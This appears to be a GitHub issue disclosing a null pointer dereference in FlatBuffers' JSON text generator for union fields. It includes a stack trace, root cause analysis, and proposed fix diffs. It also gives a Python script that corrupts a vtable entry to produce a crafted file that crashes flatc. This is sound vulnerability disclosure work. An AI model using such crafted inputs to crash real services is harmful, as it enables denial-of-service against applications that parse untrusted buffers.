Skip to content

Null Pointer Dereference in JsonPrinter::PrintOffset() for Union Types #9033

@emptyiscolor

Description

@emptyiscolor

Note: This report was discovered through fuzzing and reproduced and polished by AI for clarity.

Field Value
CWE CWE-476 (NULL Pointer Dereference)
Affected file src/idl_gen_text.cpp, lines 187-188
Tested on commit e223d69b (flatc version 25.12.19)
Reproducible with Stock flatc binary (release build)

Description

JsonPrinter::PrintOffset() handles BASE_TYPE_UNION fields by
dereferencing prev_val — a pointer to the union type discriminator byte
in the serialised table. The only guard is FLATBUFFERS_ASSERT(prev_val),
which is removed in release builds (-DNDEBUG).

When a malformed FlatBuffer has the union value field present but the
union type discriminator field absent (vtable offset zeroed), prev_val
is nullptr. Dereferencing it causes an immediate segmentation fault,
crashing flatc or any application that converts a FlatBuffer to JSON.

Affected source (src/idl_gen_text.cpp:184-188)

case BASE_TYPE_UNION: {
    // If this assert hits, you have an corrupt buffer, a union type field
    // was not present or was out of range.
    FLATBUFFERS_ASSERT(prev_val);        // gone in release builds
    auto union_type_byte = *prev_val;    // NULL DEREF

The comment on lines 185-186 acknowledges the corrupt-buffer scenario but
relies solely on an assert that does not survive release compilation.

Confirmed Call Chain

Crash observed in the stock flatc binary with this exact stack trace:

main
  flatbuffers::FlatCompiler::Compile()
    flatbuffers::TextCodeGenerator::GenerateCode()        [idl_gen_text.cpp]
      flatbuffers::GenTextFile()                          [idl_gen_text.cpp:438]
        flatbuffers::GenText()                            [idl_gen_text.cpp:419]
          flatbuffers::GenerateTextImpl()                 [idl_gen_text.cpp:383]
            flatbuffers::JsonPrinter::GenStruct()         [idl_gen_text.cpp:315]
              flatbuffers::JsonPrinter::GenFieldOffset()  [idl_gen_text.cpp:282]
                flatbuffers::JsonPrinter::PrintOffset()   [idl_gen_text.cpp:188]
                  *prev_val → SIGSEGV (address 0x0)

GenText() does not call Verifier before traversing the buffer.
The public APIs GenTextFromTable() and GenTextFile() are equally affected.

Step-by-Step Reproduction (using flatc binary)

This crash is reproducible with the stock flatc binary and a 40-byte
crafted file. No custom C++ compilation required.

Prerequisites

git clone https://github.com/google/flatbuffers.git
cd flatbuffers
git checkout e223d69b          # or any recent commit
cmake -S . -B build -DFLATBUFFERS_BUILD_FLATC=ON -DCMAKE_BUILD_TYPE=Release
cmake --build build --target flatc

Step 1 — Create a schema with a union field

Save as union_crash.fbs:

table Inner { x: int; }
union MyUnion { Inner }
table Root { u: MyUnion; }
root_type Root;

Step 2 — Generate a valid binary FlatBuffer

Save as valid.json:

{ "u_type": "Inner", "u": { "x": 42 } }

Compile to binary:

build/flatc -b union_crash.fbs valid.json
# produces valid.bin (40 bytes)

Step 3 — Corrupt the vtable (2-byte edit)

The corruption zeroes the vtable entry for the u_type field, making it
appear absent while the union value u is still present.

Save as corrupt.py:

#!/usr/bin/env python3
import struct

with open("valid.bin", "rb") as f:
    buf = bytearray(f.read())

# Follow root offset → root table → vtable
root_pos = struct.unpack_from("<I", buf, 0)[0]
vtable_soffset = struct.unpack_from("<i", buf, root_pos)[0]
vtable_pos = root_pos - vtable_soffset

# Zero out field 0 (u_type) at vtable + 4
struct.pack_into("<H", buf, vtable_pos + 4, 0)

with open("corrupt.bin", "wb") as f:
    f.write(buf)

print(f"Wrote corrupt.bin ({len(buf)} bytes, vtable u_type field zeroed)")

Run it:

python3 corrupt.py
# Wrote corrupt.bin (40 bytes, vtable u_type field zeroed)

Step 4 — Crash flatc

build/flatc --json --raw-binary union_crash.fbs -- corrupt.bin

Expected result

flatc crashes immediately with a segmentation fault:

==PID==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000
    #0 flatbuffers::JsonPrinter::PrintOffset(...)       idl_gen_text.cpp:188
    #1 flatbuffers::JsonPrinter::GenFieldOffset(...)     idl_gen_text.cpp
    #2 flatbuffers::JsonPrinter::GenStruct(...)          idl_gen_text.cpp
    #3 flatbuffers::GenerateTextImpl(...)                idl_gen_text.cpp
    #4 flatbuffers::GenTextFile(...)                     idl_gen_text.cpp
    #5 flatbuffers::TextCodeGenerator::GenerateCode(...) idl_gen_text.cpp
    #6 flatbuffers::FlatCompiler::Compile(...)
    #7 main

Without ASan, flatc simply receives SIGSEGV (signal 11) and is killed
by the OS.

Root Cause Analysis

The bug arises from the interaction of three design decisions:

  1. GenText() does not verify buffers before traversal. It walks the
    table structure assuming well-formedness.

  2. Union fields depend on a type discriminator in the preceding vtable
    slot.
    If the value field is present but the type field is absent, the
    code has no discriminator to look up.

  3. The null check uses FLATBUFFERS_ASSERT (= assert()), which is
    stripped in release builds. The code comment on line 185 explicitly
    describes the corrupt-buffer scenario but relies on a debug-only guard.

Proposed Fix

Option A — Return an error string (minimal, non-breaking)

Replace the assert with a runtime null check using the existing error-return
mechanism (const char* propagated to all callers):

--- a/src/idl_gen_text.cpp
+++ b/src/idl_gen_text.cpp
@@ -183,10 +183,9 @@ const char* PrintOffset(const void* val, const Type& type, int indent,
     switch (type.base_type) {
       case BASE_TYPE_UNION: {
-        // If this assert hits, you have an corrupt buffer, a union type field
-        // was not present or was out of range.
-        FLATBUFFERS_ASSERT(prev_val);
-        auto union_type_byte = *prev_val;  // Always a uint8_t.
+        // Guard against corrupt buffer where union type field is missing.
+        if (!prev_val) return "corrupt buffer: union type field not present";
+        auto union_type_byte = *prev_val;
         if (vector_index >= 0) {

Option B — Verify buffers before text generation

Add Verifier::VerifyBuffer() at the top of GenText() / GenTextFile()
to reject corrupt buffers before traversal. This would defend against this
bug and other unverified-buffer issues, but changes the public API contract:

--- a/src/idl_gen_text.cpp
+++ b/src/idl_gen_text.cpp
@@ -418,6 +418,10 @@ const char* GenText(const Parser& parser, const void* flatbuffer,
                     std::string* _text) {
   FLATBUFFERS_ASSERT(parser.root_struct_def_);
+  flatbuffers::Verifier verifier(
+      static_cast<const uint8_t*>(flatbuffer),
+      parser.builder_.GetSize());
+  if (!parser.root_struct_def_->Verify(verifier)) return "buffer verification failed";
   auto root = parser.opts.size_prefixed

Included Files

File Description
reproduce.sh One-command reproducer: bash reproduce.sh [/path/to/flatc]
corrupt.py Python script: corrupts valid.bincorrupt.bin
union_crash.fbs Schema with union field
valid.json Valid JSON input
valid.bin Valid 40-byte binary FlatBuffer (pre-built from schema + JSON)
corrupt.bin Pre-corrupted binary (vtable u_type zeroed) — crashes flatc directly
poc.cpp Standalone C++ PoC (alternative to the flatc reproduction)

Attachment: report1.zip

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions